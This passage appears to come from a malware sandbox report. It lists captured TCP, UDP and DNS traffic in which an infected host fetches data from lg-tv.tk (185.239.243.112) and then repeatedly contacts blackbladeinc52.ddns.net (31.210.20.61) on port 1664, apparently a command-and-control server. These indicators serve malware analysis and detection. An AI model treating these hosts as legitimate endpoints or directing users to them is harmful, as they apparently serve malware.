Sep 14, 2021 13:16:21.878858089 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878863096 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878870010 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878874063 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878885984 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878895998 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878911972 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878937960 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878946066 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878952026 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878962994 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878993034 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878995895 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879000902 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879020929 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879051924 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879060030 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879064083 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879082918 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879125118 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879126072 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879132032 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879163027 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879189014 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879201889 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879208088 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879215956 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879240036 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879252911 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879256964 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879261017 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879265070 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879288912 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879301071 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879312992 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879336119 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879347086 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879352093 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879359007 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879381895 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879394054 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879400015 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879405022 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879427910 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879437923 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879441977 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879452944 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879476070 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879481077 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879484892 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879499912 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879525900 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879529953 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879537106 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879550934 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879573107 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879575014 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879600048 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879601955 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879631996 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879640102 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879661083 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879688025 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879698992 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879705906 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879719019 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879729986 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879746914 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879777908 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879789114 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879795074 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879813910 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879857063 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879862070 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879863024 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879914045 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879957914 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879961014 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.879965067 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.879990101 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880019903 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880028009 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880033016 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880049944 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880079031 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880086899 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880091906 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880108118 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880136013 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880165100 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880171061 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880177021 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880193949 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880225897 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880230904 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880237103 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880254984 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880285025 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880291939 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880296946 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880315065 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880342960 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880350113 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880357027 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880373001 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880409956 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880409956 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880415916 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880443096 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880469084 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880481005 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880486965 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880495071 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880518913 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880531073 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880537033 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880544901 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.880578995 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.880584955 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.883337021 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903218031 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903266907 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903301954 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903326988 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903332949 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903347969 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903352022 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903357983 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903369904 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903393030 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903395891 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903422117 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903445959 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903458118 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903461933 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903472900 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903498888 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903510094 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903515100 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903526068 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903554916 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903564930 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903568983 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903584003 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903611898 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903620005 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903626919 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903640032 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903666019 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903673887 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903678894 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903692961 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903721094 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903728962 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903734922 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903749943 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903779984 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903795958 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903800964 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903808117 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903837919 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903848886 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903853893 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903867006 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903886080 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903893948 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903924942 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903939009 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903944969 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903954983 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903981924 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.903989077 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.903994083 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904007912 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904041052 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904042006 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904048920 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904068947 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904098034 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904107094 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904110909 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904128075 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904162884 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904171944 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904175997 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904192924 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904218912 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904227972 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904234886 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904247046 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904279947 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904284954 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904289961 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904330969 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904362917 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904366016 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904372931 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904392958 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904426098 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904428959 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904433966 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904458046 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904490948 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904500008 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904505014 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904524088 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904556990 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904560089 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904567003 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904587030 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904619932 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904622078 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904627085 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904649973 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904681921 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904685974 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904690981 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904715061 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904746056 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904752016 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904757977 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904776096 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904808044 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904815912 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904822111 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904838085 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904870987 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904875040 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904880047 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904905081 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904939890 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.904947996 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904954910 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.904972076 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905004978 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905006886 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905011892 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905042887 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905076027 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905078888 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905083895 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905106068 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905138969 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905141115 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905147076 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905172110 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905204058 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905208111 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905214071 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905236959 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905268908 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905277967 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905283928 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905302048 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905334949 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905339956 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905344009 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905368090 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905399084 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905404091 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905409098 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905430079 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905463934 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905469894 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905476093 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905497074 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905529976 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905533075 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905539989 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905561924 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905596972 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905603886 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905607939 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905628920 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905659914 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905668974 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905675888 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905693054 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905730009 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905739069 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905745029 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905760050 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905793905 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905798912 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905803919 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905826092 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905858994 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905862093 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905867100 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905893087 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.905929089 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.905932903 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:22.401462078 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:34.048146963 CEST	49166	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:16:37.076020956 CEST	49166	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:16:43.082492113 CEST	49166	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:16:52.175204039 CEST	49167	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:16:55.237406969 CEST	49167	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:17:01.195784092 CEST	49167	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:17:17.351660967 CEST	49168	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:17:20.354322910 CEST	49168	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:17:26.360841990 CEST	49168	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:17:58.120028973 CEST	49169	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:18:01.120748997 CEST	49169	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:18:07.127391100 CEST	49169	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:18:15.996423006 CEST	49170	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:18:19.000489950 CEST	49170	1664	192.168.2.22	31.210.20.61
Sep 14, 2021 13:18:25.006475925 CEST	49170	1664	192.168.2.22	31.210.20.61

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 13:16:21.569555998 CEST	49972	53	192.168.2.22	8.8.8.8
Sep 14, 2021 13:16:21.654107094 CEST	53	49972	8.8.8.8	192.168.2.22
Sep 14, 2021 13:16:34.001727104 CEST	51771	53	192.168.2.22	8.8.8.8
Sep 14, 2021 13:16:34.038151026 CEST	53	51771	8.8.8.8	192.168.2.22
Sep 14, 2021 13:16:52.140332937 CEST	59867	53	192.168.2.22	8.8.8.8
Sep 14, 2021 13:16:52.173284054 CEST	53	59867	8.8.8.8	192.168.2.22
Sep 14, 2021 13:17:17.275789022 CEST	50315	53	192.168.2.22	8.8.8.8
Sep 14, 2021 13:17:17.311537981 CEST	53	50315	8.8.8.8	192.168.2.22
Sep 14, 2021 13:17:17.313028097 CEST	50315	53	192.168.2.22	8.8.8.8
Sep 14, 2021 13:17:17.348654985 CEST	53	50315	8.8.8.8	192.168.2.22
Sep 14, 2021 13:17:58.081119061 CEST	50072	53	192.168.2.22	8.8.8.8
Sep 14, 2021 13:17:58.118311882 CEST	53	50072	8.8.8.8	192.168.2.22
Sep 14, 2021 13:18:15.957704067 CEST	54304	53	192.168.2.22	8.8.8.8
Sep 14, 2021 13:18:15.990187883 CEST	53	54304	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 14, 2021 13:16:21.569555998 CEST	192.168.2.22	8.8.8.8	0x9983	Standard query (0)	lg-tv.tk	A (IP address)	IN (0x0001)
Sep 14, 2021 13:16:34.001727104 CEST	192.168.2.22	8.8.8.8	0x3fc0	Standard query (0)	blackbladeinc52.ddns.net	A (IP address)	IN (0x0001)
Sep 14, 2021 13:16:52.140332937 CEST	192.168.2.22	8.8.8.8	0x501	Standard query (0)	blackbladeinc52.ddns.net	A (IP address)	IN (0x0001)
Sep 14, 2021 13:17:17.275789022 CEST	192.168.2.22	8.8.8.8	0x13f5	Standard query (0)	blackbladeinc52.ddns.net	A (IP address)	IN (0x0001)
